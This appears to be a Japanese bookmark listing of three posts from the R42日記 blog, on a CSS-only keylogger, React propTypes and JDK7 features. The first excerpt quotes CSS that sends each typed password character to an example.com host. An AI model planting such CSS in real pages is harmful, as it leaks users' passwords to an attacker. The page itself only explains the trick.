タグ

ブックマーク / takahashikzn.root42.jp (3)

  • CSSだけでキーロガーを作る(※追記あり) - R42日記

    github.com よくもまあこんなこと思いついたなw 要するに、 input[type="password"][value$="a"] { background-image: url("http://example.com/a"); } input[type="password"][value$="b"] { background-image: url("http://example.com/b"); } ... とすることで、キータイプ毎に特定のHTTPリクエストを発生させて、それをサーバ側でキャプチャするわけです。極めて簡単。 これはもう既に悪用されているでしょうなあ… 追記 input[type="password"][value$="a"] { background-image: url("http://example.com/a?id=1234abcd"); } input[

    CSSだけでキーロガーを作る(※追記あり) - R42日記
    ledsun
    ledsun 2018/02/28
    reactでvalue値を毎回属性に反映したい(vdomとdomを乖離させたくない)気持ちはわかる。常にvalueを連動させる必要があるかどうかは謎。不要ならvalueだけ特別扱いすればいいのよね。
  • React-0.13でpropTypesを違和感なく記述する - R42日記

    最近、とある業務システムの一部となるリッチ画面をReactで開発してます。 Reactは良く出来ていると思います。 できるだけステートレスにすることで安全なコードを記述するという思想は僕の好みです。 Fluxも同じく良い。『処理の流れは一方向。何も考えずにイベントを処理し続ければ良い』という、ある種のストリーミング的な発想により、非常に見通しの良い構成を実現できます。 Fluxのフレームワークは乱立気味ですが、色々比較した結果、僕はrefluxを選びました。 そんなに多機能じゃないので自分で魔改造しやすいところがナイス。 React-0.13から使えるclass構文 最近リリースされたreact-0.13からES6のclass構文を使えるようになりました。 reactに付属するJSXTranformerでパースできるようになったとは言え、 イマドキReactを使うような人は当然Babelで

    React-0.13でpropTypesを違和感なく記述する - R42日記
    ledsun
    ledsun 2016/08/12
    staticなcomputed propertyを使うのか、なるほど
  • JDK7正式版の新機能一覧(Java言語仕様に関して) - R42日記

    2011-08-02追記 JDK7に致命的なバグ 重要なので先頭に追記しておきますが、JDK7のホットスポットコンパイラに致命的なバグが存在するそうです。 詳しくはコチラ。 http://d.hatena.ne.jp/takahashikzn/20110802 JDK7を使用する際はご注意下さい。 (Javadocのスタイルもガラっと変わりました!!) http://www.oracle.com/technetwork/java/javase/jdk7-relnotes-418459.html JDK7の正式版がリリースされています。 興味深い機能やAPIなどが追加されているわけですが、 その中でもみんな一番気になるところである、Java言語仕様の変更についてご紹介。 あとは、個人的にjava.lang.invokeなんてアヤシゲなパッケージが気になっているのですが… APIを見る限り、動

    JDK7正式版の新機能一覧(Java言語仕様に関して) - R42日記
    ledsun
    ledsun 2011/08/01
    C#の2.0以降の進化っぷりと比べると、がっかり感が半端ない。
  • 1